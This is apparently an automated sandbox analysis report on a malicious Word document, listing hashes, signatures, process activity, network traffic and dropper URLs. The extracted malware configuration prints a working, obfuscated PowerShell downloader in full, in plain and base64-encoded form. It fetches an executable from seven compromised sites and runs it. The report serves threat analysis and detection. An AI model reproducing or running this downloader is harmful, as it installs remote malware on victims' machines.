Analysis

  • max time kernel
    136s
  • max time network
    125s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/05/2024, 09:03 UTC

General

  • Target

    71798c1415bd2c656552ec32c9835538_JaffaCakes118.doc

  • Size

    187KB

  • MD5

    71798c1415bd2c656552ec32c9835538

  • SHA1

    51702d9597e77b881c90467455c6479d6a8b7774

  • SHA256

    0ed1adf222903a5b3335427d554d4a74c05a27cfd1a438788c04f3b3d720c002

  • SHA512

    fcaaeaa1556acb2d5181f9ea0706b0d65240f3d118ca5c81cdb22361b908571aae7b9e9164ef730feaa9c97729c5e692973639e2bc9273a410f5d3329b4cd64f

  • SSDEEP

    1536:RGGGGGGGGGG2xJLEt+LaaGGGGGGGGGGjLo9xilATmd8YkYeT/EA8sap8cjufajnG:vrfrzOH98ipgEh5JYR

Score
10/10

Malware Config

Extracted

Language
ps1
Source
1
$C2vaij5=(('P'+'cu')+'u'+('t'+'ru'));.('new-'+'it'+'em') $env:UsERpRoFILE\HY3yt3i\S8K49um\ -itemtype diRectORy;[Net.ServicePointManager]::"S`eCU`RIt`YPro`TocoL" = (('t'+'ls')+('12, t'+'ls')+('1'+'1,')+(' t'+'l')+'s');$Skyq7hm = ('X2'+('8'+'z03')+'1d');$Ythxbrf=(('O'+'ne')+('w'+'m9')+'b');$Wdaid86=$env:userprofile+((('w'+'vO')+('Hy3'+'yt')+('3i'+'wv')+('O'+'S8')+('k4'+'9')+('um'+'w')+'vO')."RepLa`Ce"(('w'+'vO'),[strIng][chaR]92))+$Skyq7hm+(('.e'+'x')+'e');$Nbqiyti=('T'+('8'+'hyxg')+'m');$Wt0reis=&('new-'+'o'+'bj'+'ect') neT.wEbcLieNt;$Eqqj5h9=(('ht'+'t')+'p:'+('//d'+'ty')+('l.shop/w'+'p-'+'conten'+'t/W68')+('Nx'+'/*htt')+'p'+'s'+('://s'+'tar'+'-')+'s'+('p'+'eed.'+'vi')+'p'+'/'+('wp'+'-')+('a'+'d'+'min/U'+'2'+'jRIg/')+('*h'+'t')+'tp'+('s:'+'//')+'c'+('shu'+'b1')+('23'+'.cn/'+'wp-')+'a'+('dmin/G'+'a'+'js')+'/*'+('h'+'tt')+'p'+('s:/'+'/')+('viettell'+'o'+'gisti')+'cs'+('.c'+'o'+'m.v')+'n/'+'w'+('p'+'-'+'content')+('/oS4'+'/')+('*http://co'+'c'+'o')+('ca'+'t.se/')+('w'+'p-')+('a'+'dm')+('in/2'+'O')+'a'+('f'+'/*')+'ht'+('tp://'+'a')+('nd'+'r')+('e'+'si')+('rjan.'+'i')+('r/w'+'p')+'-'+('admin'+'/'+'JSH'+'/*'+'ht')+'t'+('ps'+':/')+'/'+('sptrad'+'e')+('.co'+'m')+'.b'+('r/wp'+'-')+'i'+'n'+'c'+('ludes/'+'iF'+'ZOvL')+'/')."sP`liT"([char]42);$Mek1xwu=(('Kw'+'_e')+'p'+'9u');foreach($Ti8hn1p in $Eqqj5h9){try{$Wt0reis."d`ow`NlOaDf`IlE"($Ti8hn1p, $Wdaid86);$W6p1j7h=(('H5'+'8e')+('jr'+'l'));If ((.('G'+'et-'+'Item') $Wdaid86)."LeN`Gth" -ge 27194) {&('I'+'nvoke-I'+'tem')($Wdaid86);$Cehylh9=('W5'+('cud'+'04'));break;$K433x4w=(('Wq'+'5')+'1'+('p'+'m9'))}}catch{}}$Qel4met=(('M'+'io')+'c'+('f'+'7h'))
URLs
exe.dropper

http://dtyl.shop/wp-content/W68Nx/

exe.dropper

https://star-speed.vip/wp-admin/U2jRIg/

exe.dropper

https://cshub123.cn/wp-admin/Gajs/

exe.dropper

https://viettellogistics.com.vn/wp-content/oS4/

exe.dropper

http://cococat.se/wp-admin/2Oaf/

exe.dropper

http://andresirjan.ir/wp-admin/JSH/

exe.dropper

https://sptrade.com.br/wp-includes/iFZOvL/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\71798c1415bd2c656552ec32c9835538_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3260
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -encod JABDADIAdgBhAGkAagA1AD0AKAAoACcAUAAnACsAJwBjAHUAJwApACsAJwB1ACcAKwAoACcAdAAnACsAJwByAHUAJwApACkAOwAuACgAJwBuAGUAdwAtACcAKwAnAGkAdAAnACsAJwBlAG0AJwApACAAJABlAG4AdgA6AFUAcwBFAFIAcABSAG8ARgBJAEwARQBcAEgAWQAzAHkAdAAzAGkAXABTADgASwA0ADkAdQBtAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQAaQBSAGUAYwB0AE8AUgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBDAFUAYABSAEkAdABgAFkAUAByAG8AYABUAG8AYwBvAEwAIgAgAD0AIAAoACgAJwB0ACcAKwAnAGwAcwAnACkAKwAoACcAMQAyACwAIAB0ACcAKwAnAGwAcwAnACkAKwAoACcAMQAnACsAJwAxACwAJwApACsAKAAnACAAdAAnACsAJwBsACcAKQArACcAcwAnACkAOwAkAFMAawB5AHEANwBoAG0AIAA9ACAAKAAnAFgAMgAnACsAKAAnADgAJwArACcAegAwADMAJwApACsAJwAxAGQAJwApADsAJABZAHQAaAB4AGIAcgBmAD0AKAAoACcATwAnACsAJwBuAGUAJwApACsAKAAnAHcAJwArACcAbQA5ACcAKQArACcAYgAnACkAOwAkAFcAZABhAGkAZAA4ADYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACgAJwB3ACcAKwAnAHYATwAnACkAKwAoACcASAB5ADMAJwArACcAeQB0ACcAKQArACgAJwAzAGkAJwArACcAdwB2ACcAKQArACgAJwBPACcAKwAnAFMAOAAnACkAKwAoACcAawA0ACcAKwAnADkAJwApACsAKAAnAHUAbQAnACsAJwB3ACcAKQArACcAdgBPACcAKQAuACIAUgBlAHAATABhAGAAQwBlACIAKAAoACcAdwAnACsAJwB2AE8AJwApACwAWwBzAHQAcgBJAG4AZwBdAFsAYwBoAGEAUgBdADkAMgApACkAKwAkAFMAawB5AHEANwBoAG0AKwAoACgAJwAuAGUAJwArACcAeAAnACkAKwAnAGUAJwApADsAJABOAGIAcQBpAHkAdABpAD0AKAAnAFQAJwArACgAJwA4ACcAKwAnAGgAeQB4AGcAJwApACsAJwBtACcAKQA7ACQAVwB0ADAAcgBlAGkAcwA9ACYAKAAnAG4AZQB3AC0AJwArACcAbwAnACsAJwBiAGoAJwArACcAZQBjAHQAJwApACAAbgBlAFQALgB3AEUAYgBjAEwAaQBlAE4AdAA7ACQARQBxAHEAagA1AGgAOQA9ACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAA6ACcAKwAoACcALwAvAGQAJwArACcAdAB5ACcAKQArACgAJwBsAC4AcwBoAG8AcAAvAHcAJwArACcAcAAtACcAKwAnAGMAbwBuAHQAZQBuACcAKwAnAHQALwBXADYAOAAnACkAKwAoACcATgB4ACcAKwAnAC8AKgBoAHQAdAAnACkAKwAnAHAAJwArACcAcwAnACsAKAAnADoALwAvAHMAJwArACcAdABhAHIAJwArACcALQAnACkAKwAnAHMAJwArACgAJwBwACcAKwAnAGUAZQBkAC4AJwArACcAdgBpACcAKQArACcAcAAnACsAJwAvACcAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAJwArACcAZAAnACsAJwBtAGkAbgAvAFUAJwArACcAMgAnACsAJwBqAFIASQBnAC8AJwApACsAKAAnACoAaAAnACsAJwB0ACcAKQArACcAdABwACcAKwAoACcAcwA6ACcAKwAnAC8ALwAnACkAKwAnAGMAJwArACgAJwBzAGgAdQAnACsAJwBiADEAJwApACsAKAAnADIAMwAnACsAJwAuAGMAbgAvACcAKwAnAHcAcAAtACcAKQArACcAYQAnACsAKAAnAGQAbQBpAG4ALwBHACcAKwAnAGEAJwArACcAagBzACcAKQArACcALwAqACcAKwAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKwAoACcAcwA6AC8AJwArACcALwAnACkAKwAoACcAdgBpAGUAdAB0AGUAbABsACcAKwAnAG8AJwArACcAZwBpAHMAdABpACcAKQArACcAYwBzACcAKwAoACcALgBjACcAKwAnAG8AJwArACcAbQAuAHYAJwApACsAJwBuAC8AJwArACcAdwAnACsAKAAnAHAAJwArACcALQAnACsAJwBjAG8AbgB0AGUAbgB0ACcAKQArACgAJwAvAG8AUwA0ACcAKwAnAC8AJwApACsAKAAnACoAaAB0AHQAcAA6AC8ALwBjAG8AJwArACcAYwAnACsAJwBvACcAKQArACgAJwBjAGEAJwArACcAdAAuAHMAZQAvACcAKQArACgAJwB3ACcAKwAnAHAALQAnACkAKwAoACcAYQAnACsAJwBkAG0AJwApACsAKAAnAGkAbgAvADIAJwArACcATwAnACkAKwAnAGEAJwArACgAJwBmACcAKwAnAC8AKgAnACkAKwAnAGgAdAAnACsAKAAnAHQAcAA6AC8ALwAnACsAJwBhACcAKQArACgAJwBuAGQAJwArACcAcgAnACkAKwAoACcAZQAnACsAJwBzAGkAJwApACsAKAAnAHIAagBhAG4ALgAnACsAJwBpACcAKQArACgAJwByAC8AdwAnACsAJwBwACcAKQArACcALQAnACsAKAAnAGEAZABtAGkAbgAnACsAJwAvACcAKwAnAEoAUwBIACcAKwAnAC8AKgAnACsAJwBoAHQAJwApACsAJwB0ACcAKwAoACcAcABzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBzAHAAdAByAGEAZAAnACsAJwBlACcAKQArACgAJwAuAGMAbwAnACsAJwBtACcAKQArACcALgBiACcAKwAoACcAcgAvAHcAcAAnACsAJwAtACcAKQArACcAaQAnACsAJwBuACcAKwAnAGMAJwArACgAJwBsAHUAZABlAHMALwAnACsAJwBpAEYAJwArACcAWgBPAHYATAAnACkAKwAnAC8AJwApAC4AIgBzAFAAYABsAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAE0AZQBrADEAeAB3AHUAPQAoACgAJwBLAHcAJwArACcAXwBlACcAKQArACcAcAAnACsAJwA5AHUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAVABpADgAaABuADEAcAAgAGkAbgAgACQARQBxAHEAagA1AGgAOQApAHsAdAByAHkAewAkAFcAdAAwAHIAZQBpAHMALgAiAGQAYABvAHcAYABOAGwATwBhAEQAZgBgAEkAbABFACIAKAAkAFQAaQA4AGgAbgAxAHAALAAgACQAVwBkAGEAaQBkADgANgApADsAJABXADYAcAAxAGoANwBoAD0AKAAoACcASAA1ACcAKwAnADgAZQAnACkAKwAoACcAagByACcAKwAnAGwAJwApACkAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQAVwBkAGEAaQBkADgANgApAC4AIgBMAGUATgBgAEcAdABoACIAIAAtAGcAZQAgADIANwAxADkANAApACAAewAmACgAJwBJACcAKwAnAG4AdgBvAGsAZQAtAEkAJwArACcAdABlAG0AJwApACgAJABXAGQAYQBpAGQAOAA2ACkAOwAkAEMAZQBoAHkAbABoADkAPQAoACcAVwA1ACcAKwAoACcAYwB1AGQAJwArACcAMAA0ACcAKQApADsAYgByAGUAYQBrADsAJABLADQAMwAzAHgANAB3AD0AKAAoACcAVwBxACcAKwAnADUAJwApACsAJwAxACcAKwAoACcAcAAnACsAJwBtADkAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAZQBsADQAbQBlAHQAPQAoACgAJwBNACcAKwAnAGkAbwAnACkAKwAnAGMAJwArACgAJwBmACcAKwAnADcAaAAnACkAKQA=
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:3988

Network

  • flag-us
    DNS
    241.150.49.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.150.49.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    roaming.officeapps.live.com
    WINWORD.EXE
    Remote address:
    8.8.8.8:53
    Request
    roaming.officeapps.live.com
    IN A
    Response
    roaming.officeapps.live.com
    IN CNAME
    prod.roaming1.live.com.akadns.net
    prod.roaming1.live.com.akadns.net
    IN CNAME
    eur.roaming1.live.com.akadns.net
    eur.roaming1.live.com.akadns.net
    IN CNAME
    neu-azsc-000.roaming.officeapps.live.com
    neu-azsc-000.roaming.officeapps.live.com
    IN CNAME
    osiprod-neu-buff-azsc-000.northeurope.cloudapp.azure.com
    osiprod-neu-buff-azsc-000.northeurope.cloudapp.azure.com
    IN A
    52.109.76.243
  • flag-ie
    POST
    https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
    WINWORD.EXE
    Remote address:
    52.109.76.243:443
    Request
    POST /rs/RoamingSoapService.svc HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: text/xml; charset=utf-8
    User-Agent: MS-WebServices/1.0
    SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
    Content-Length: 511
    Host: roaming.officeapps.live.com
    Response
    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/xml; charset=utf-8
    Server: Microsoft-IIS/10.0
    X-OfficeFE: RoamingFE_IN_386
    X-OfficeVersion: 16.0.17711.30575
    X-OfficeCluster: neu-000.roaming.officeapps.live.com
    X-CorrelationId: ebbc2c58-855e-4c22-951d-c6d7117c4adf
    X-Powered-By: ASP.NET
    Date: Sat, 25 May 2024 09:03:56 GMT
    Content-Length: 654
  • flag-us
    DNS
    240.143.123.92.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    240.143.123.92.in-addr.arpa
    IN PTR
    Response
    240.143.123.92.in-addr.arpa
    IN PTR
    a92-123-143-240deploystaticakamaitechnologiescom
  • flag-us
    DNS
    240.76.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    240.76.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    243.76.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    243.76.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    dtyl.shop
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    dtyl.shop
    IN A
    Response
  • flag-us
    DNS
    73.31.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    73.31.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    star-speed.vip
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    star-speed.vip
    IN A
    Response
  • flag-us
    DNS
    cshub123.cn
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    cshub123.cn
    IN A
    Response
    cshub123.cn
    IN A
    216.152.233.103
  • flag-us
    DNS
    g.bing.com
    Remote address:
    8.8.8.8:53
    Request
    g.bing.com
    IN A
    Response
    g.bing.com
    IN CNAME
    g-bing-com.dual-a-0034.a-msedge.net
    g-bing-com.dual-a-0034.a-msedge.net
    IN CNAME
    dual-a-0034.a-msedge.net
    dual-a-0034.a-msedge.net
    IN A
    204.79.197.237
    dual-a-0034.a-msedge.net
    IN A
    13.107.21.237
  • flag-us
    GET
    https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8bxpffpy6Zp9jxlVY79MSwTVUCUwWnaO2_USypv0wR-U-ZOqDRUayShnatE7mK_F6xlLTkPIHy7bwspOIwhgonGAdzhh9wZrp-1AfZHLrdkZVo_oGzqWLYPvzpPY0XwIqpJJnbFX372cE-X5pDRUdBQsSBP9FQDM9BMFfHsG1l8y2LrU5%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Dd895e4761d7014c66b98825dac2e0c60&TIME=20240426T135156Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189&muid=DA7A91E17E56FC56DF5DE341A69C2E55
    Remote address:
    204.79.197.237:443
    Request
    GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8bxpffpy6Zp9jxlVY79MSwTVUCUwWnaO2_USypv0wR-U-ZOqDRUayShnatE7mK_F6xlLTkPIHy7bwspOIwhgonGAdzhh9wZrp-1AfZHLrdkZVo_oGzqWLYPvzpPY0XwIqpJJnbFX372cE-X5pDRUdBQsSBP9FQDM9BMFfHsG1l8y2LrU5%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Dd895e4761d7014c66b98825dac2e0c60&TIME=20240426T135156Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189&muid=DA7A91E17E56FC56DF5DE341A69C2E55 HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=04589EF10F676972005D8A7B0E8768B7; domain=.bing.com; expires=Thu, 19-Jun-2025 09:03:58 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 9FE6280A0B7B4D5F8209A4BE6B276662 Ref B: LON04EDGE1021 Ref C: 2024-05-25T09:03:58Z
    date: Sat, 25 May 2024 09:03:58 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8bxpffpy6Zp9jxlVY79MSwTVUCUwWnaO2_USypv0wR-U-ZOqDRUayShnatE7mK_F6xlLTkPIHy7bwspOIwhgonGAdzhh9wZrp-1AfZHLrdkZVo_oGzqWLYPvzpPY0XwIqpJJnbFX372cE-X5pDRUdBQsSBP9FQDM9BMFfHsG1l8y2LrU5%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Dd895e4761d7014c66b98825dac2e0c60&TIME=20240426T135156Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189&muid=DA7A91E17E56FC56DF5DE341A69C2E55
    Remote address:
    204.79.197.237:443
    Request
    GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8bxpffpy6Zp9jxlVY79MSwTVUCUwWnaO2_USypv0wR-U-ZOqDRUayShnatE7mK_F6xlLTkPIHy7bwspOIwhgonGAdzhh9wZrp-1AfZHLrdkZVo_oGzqWLYPvzpPY0XwIqpJJnbFX372cE-X5pDRUdBQsSBP9FQDM9BMFfHsG1l8y2LrU5%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Dd895e4761d7014c66b98825dac2e0c60&TIME=20240426T135156Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189&muid=DA7A91E17E56FC56DF5DE341A69C2E55 HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=04589EF10F676972005D8A7B0E8768B7; _EDGE_S=SID=264D58218138605D3A2F4CAB80706195
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=uDS9cTTUKAGwPKlM7vyA-sxMR_CxASjgG6JIS-HjIPk; domain=.bing.com; expires=Thu, 19-Jun-2025 09:03:59 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: E4215425B6B947EBA10CA8627B131BEA Ref B: LON04EDGE1021 Ref C: 2024-05-25T09:03:59Z
    date: Sat, 25 May 2024 09:03:58 GMT
  • flag-nl
    GET
    https://www.bing.com/aes/c.gif?RG=6e7988d151f34ab5bb010a5e9231d576&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T135156Z&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189
    Remote address:
    23.62.61.194:443
    Request
    GET /aes/c.gif?RG=6e7988d151f34ab5bb010a5e9231d576&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T135156Z&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189 HTTP/2.0
    host: www.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=04589EF10F676972005D8A7B0E8768B7
    Response
    HTTP/2.0 200
    cache-control: private,no-store
    pragma: no-cache
    vary: Origin
    p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 34CA4CB248D64E92A9CC695BE0A761DE Ref B: BRU30EDGE0913 Ref C: 2024-05-25T09:03:59Z
    content-length: 0
    date: Sat, 25 May 2024 09:03:59 GMT
    set-cookie: _EDGE_S=SID=264D58218138605D3A2F4CAB80706195; path=/; httponly; domain=bing.com
    set-cookie: MUIDB=04589EF10F676972005D8A7B0E8768B7; path=/; httponly; expires=Thu, 19-Jun-2025 09:03:59 GMT
    alt-svc: h3=":443"; ma=93600
    x-cdn-traceid: 0.be3d3e17.1716627839.1cc1226c
  • flag-us
    DNS
    237.197.79.204.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    237.197.79.204.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    194.61.62.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    194.61.62.23.in-addr.arpa
    IN PTR
    Response
    194.61.62.23.in-addr.arpa
    IN PTR
    a23-62-61-194deploystaticakamaitechnologiescom
  • flag-nl
    GET
    https://www.bing.com/th?id=OADD2.10239356736264_1E1NQW5LZ8SVSGPEK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
    Remote address:
    23.62.61.194:443
    Request
    GET /th?id=OADD2.10239356736264_1E1NQW5LZ8SVSGPEK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
    host: www.bing.com
    accept: */*
    cookie: MUID=04589EF10F676972005D8A7B0E8768B7; _EDGE_S=SID=264D58218138605D3A2F4CAB80706195; MSPTC=uDS9cTTUKAGwPKlM7vyA-sxMR_CxASjgG6JIS-HjIPk; MUIDB=04589EF10F676972005D8A7B0E8768B7
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-type: image/png
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    content-length: 999
    date: Sat, 25 May 2024 09:04:01 GMT
    alt-svc: h3=":443"; ma=93600
    x-cdn-traceid: 0.be3d3e17.1716627841.1cc1289f
  • flag-us
    DNS
    43.58.199.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    43.58.199.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    94.65.42.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    94.65.42.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    183.142.211.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    183.142.211.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    metadata.templates.cdn.office.net
    WINWORD.EXE
    Remote address:
    8.8.8.8:53
    Request
    metadata.templates.cdn.office.net
    IN A
    Response
    metadata.templates.cdn.office.net
    IN CNAME
    templatesmetadata.office.net
    templatesmetadata.office.net
    IN CNAME
    templatesmetadata.office.net.edgekey.net
    templatesmetadata.office.net.edgekey.net
    IN CNAME
    e26769.dscb.akamaiedge.net
    e26769.dscb.akamaiedge.net
    IN A
    23.62.61.162
    e26769.dscb.akamaiedge.net
    IN A
    23.62.61.184
  • flag-nl
    GET
    https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C
    WINWORD.EXE
    Remote address:
    23.62.61.162:443
    Request
    GET /client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: metadata.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Type: text/xml
    Server: Kestrel
    Content-Encoding: gzip
    Content-Length: 1264
    Cache-Control: max-age=186735
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Vary: Accept-Encoding
  • flag-us
    DNS
    binaries.templates.cdn.office.net
    WINWORD.EXE
    Remote address:
    8.8.8.8:53
    Request
    binaries.templates.cdn.office.net
    IN A
    Response
    binaries.templates.cdn.office.net
    IN CNAME
    binaries.templates.cdn.office.net.edgesuite.net
    binaries.templates.cdn.office.net.edgesuite.net
    IN CNAME
    a1847.dscg2.akamai.net
    a1847.dscg2.akamai.net
    IN A
    2.17.251.23
    a1847.dscg2.akamai.net
    IN A
    2.17.251.32
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp01840907.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 43653
    Content-Type: application/vnd.ms-cab-compressed
